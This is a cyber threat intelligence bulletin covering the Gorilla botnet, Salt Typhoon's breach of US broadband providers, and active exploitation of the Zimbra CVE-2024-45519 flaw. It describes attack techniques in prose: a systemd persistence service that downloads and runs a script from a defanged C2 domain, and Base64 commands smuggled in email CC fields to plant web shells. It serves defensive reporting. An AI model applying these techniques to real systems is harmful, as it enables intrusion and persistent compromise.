Ransomware/Malware Activity
New Gorilla Botnet Issues Over 300,000 DDOS Attacks
Cybersecurity researchers have identified a new botnet family called “Gorilla Botnet” that has been particularly active through the month of September. The Botnet issued over 300,000 attack commands targeting over 100 countries, although most of the attacks were directed at the U.S., China, Canada, and Germany. Targets allegedly included universities, governments, telecommunications companies, banks, and the gaming industry. Researchers determined that the Botnet relied heavily on User Datagram Protocol (UDP) Floods as its preferred method of attack followed by ACK Bypass Flood and VSE Flood methods.
The Botnet can carry out many different types of attacks and uses encryption algorithms similar to those employed by the Keksec group to hide key information, suggesting that the attackers behind this campaign could be related to Keksec. Examination of Gorilla Botnet’s source code indicates that it appears to be a variant of the leaked Mirai Botnet. The Botnet infection supports multiple CPU architectures, connects with one of five predefined command-and-control (C2) servers, and embeds functions to exploit a security flaw in Apache Hadoop YARN RPC to achieve remote code execution.
The Botnet maintains persistence by creating a service file named “custom.service” within the “/etc/systemd/system/” directory which is configured to run automatically at system start up. This service downloads a shell script “lol.sh” from remote server “pen[.]gorillafirewall[.]su” to the “/tmp/” directory, sets execution permissions, and executes the script. Denial of Service attacks continue to be one of the most prevalent cybersecurity threats. CTIX analysts recommend that organizations implement controls to mitigate the risk posed by DOS attacks. CTIX analysts will continue to report on new and emerging forms of malware and associated campaigns.
Threat Actor Activity
Chinese Hackers Breach Broadband Providers to Target U.S. Government's Wiretap System
As an update to our September 27 Flash Threat Actor report, more recent developments have revealed that the Chinese hacking group “Salt Typhoon” breached the networks of major U.S. broadband providers, including Verizon, AT&T, and Lumen Technologies. The hackers allegedly accessed systems used by the U.S. federal government for court-authorized wiretaps, potentially maintaining this access for months to collect intelligence. The Wall Street Journal, citing anonymous sources, reported the breach and noted that the hackers might have engaged in extensive data collection from internet service providers serving millions of Americans.
Salt Typhoon, also known as Earth Estries and Ghost Emperor, has been active since at least 2019. The group typically targets government entities and telecommunications companies, primarily in Southeast Asia, but has also attacked organizations across multiple countries, including Brazil, Canada, and the UK. The group's sophisticated methods often involve exploiting vulnerabilities in software, such as the ProxyLogon flaws in Microsoft Exchange Server, and deploying custom backdoors and rootkits. The U.S. government and private sector security experts are actively investigating the breach's impact, including the type and volume of data accessed.
This incident is part of a broader pattern of cyber espionage by Chinese state-backed actors targeting U.S. and European networking devices and ISPs. Notably, these groups often share infrastructure and tools, indicating coordinated efforts under a common umbrella. Despite the serious implications, Chinese authorities have dismissed the allegations, accusing the U.S. of fabricating narratives to blame China. The ongoing investigation seeks to determine the initial access method used by the hackers, with Cisco routers being one potential vector under scrutiny, though no direct evidence has yet implicated Cisco equipment in the breach. CTIX analysts will continue reporting about ongoing cybersecurity activity amongst threat actors.
Vulnerabilities
CISA Adds Critical Synacor Zimbra Vulnerability to the Known Exploited Vulnerabilities Catalog
The Zimbra Collaboration platform is currently facing active exploitation attempts targeting a critical vulnerability, allowing unauthenticated attackers to execute arbitrary commands through a flaw in its postjournal service. Discovered by researcher Alan Li and assigned a CVSS score of 10, the vulnerability, tracked as CVE-2024-45519, was addressed in Zimbra’s September 2024 updates for versions 8.8.15 Patch 46, 9.0.0 Patch 41, 10.0.9, and 10.1.1. The attacks began on September 28, 2024, after Project Discovery disclosed technical details and proof-of-concept (PoC) exploit code.
Threat actors exploit the flaw by sending spoofed Gmail emails with Base64-encoded commands in the CC fields, which Zimbra servers parse and execute. This approach has been used to deploy web shells on vulnerable servers, allowing further control and execution of commands. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has since added the flaw to its Known Exploited Vulnerabilities (KEV) catalog, citing the risk it poses to federal and private systems. CISA has mandated that all Federal Civilian Executive Branch (FCEB) agencies remediate the issue by no later than October 24, 2024, and recommends private organizations apply the patches as well. While the attacks are ongoing, the responsible threat actors remain unidentified. For systems where immediate patching is not feasible, temporarily removing the postjournal service has been suggested to mitigate potential risks. CTIX analysts recommend that affected users follow the guidance in the KEV to prevent exploitation.
- The Hacker News: CVE-2024-45519 Article
- Security Affairs: CVE-2024-45519 Article
- CISA: CVE-2024-45519 KEV Advisory
The semi-weekly Ankura Cyber Threat Investigations and Expert Services (CTIX) FLASH Update is designed to provide timely and relevant cyber intelligence about current or emerging cyber events. The preceding is a collection of cyber threat intelligence leads assembled over the past few days and typically includes high-level intelligence about recent threat group/actor activity and newly identified vulnerabilities impacting a wide range of industries and victims. Please feel free to contact the CTIX Team (ctix@ankura.com) if you need more context.
© Copyright 2024. The views expressed herein are those of the author(s) and not necessarily the views of Ankura Consulting Group, LLC., its management, its subsidiaries, its affiliates, or its other professionals. Ankura is not a law firm and cannot provide legal advice
